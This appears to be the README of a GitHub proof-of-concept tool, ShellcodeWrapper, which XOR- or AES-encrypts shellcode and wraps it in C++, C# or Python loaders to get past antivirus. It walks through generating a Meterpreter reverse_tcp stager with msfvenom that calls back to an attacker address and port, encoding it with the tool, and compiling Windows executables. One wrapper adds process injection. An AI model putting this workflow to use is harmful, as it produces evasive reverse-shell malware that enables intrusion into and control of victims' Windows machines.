- Updated by @andrewchiles to remove hardcoded output paths and add additional code templates
Author: Arno0x0x - @Arno0x0x
These little proof of concept are inspired by this blogpost: Bypass antivirus with 10 lines of code
The technique uses two kind of code file:
- The shellcode encoder/encrypter:
shellcode_encoder.py
- Various shellcode wrapper, in C++, C# and Python:
encryptedShellcodeWrapper.cpp
- for now supports only XOR encryptionencryptedShellcodeWrapper.cs
- supports both XOR and AES encryptionencryptedShellcodeWrapper_inject.cs
- same as above with process injectionencryptedShellcodeWrapper.py
- supports both XOR and AES encryption
Installation is straight forward:
- Git clone this repository:
git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper
- cd into the ShellcodeWrapper folder:
cd ShellcodeWrapper
- Install requirements using
pip install -r requirements.txt
- Give the execution rights to the main script:
chmod +x shellcode_encoder.py
First, you need to obtain a usable shellcode from metasploit (run it from a Kali distribution), for example:
root@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw > shellcode.raw
In this example, the output is a raw (unencoded & unencrypted) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (payload and parameters).
Second, run the shellcode_encoder.py
script along with the desired arguments:
- raw shellcode filename
- encryption key
- encryption type:
xor
oraes
- desired output:
base64
,cpp
,csharp
,python
For instance, to xor encrypt the shellcode with the key 'thisismykey' and get an output code file in C#, C++ and Python:
root@kali:~# ./shellcode_encoder.py -cpp -cs -py shellcode.raw thisismykey xor
This will generate C#, C++ and Python code file in the result
folder. Those files are ready to use/compile.
Eventually:
- For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for Win32 console application and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).
- For the C# wrapper, compile the C# code file into a Windows executable:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs
- For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable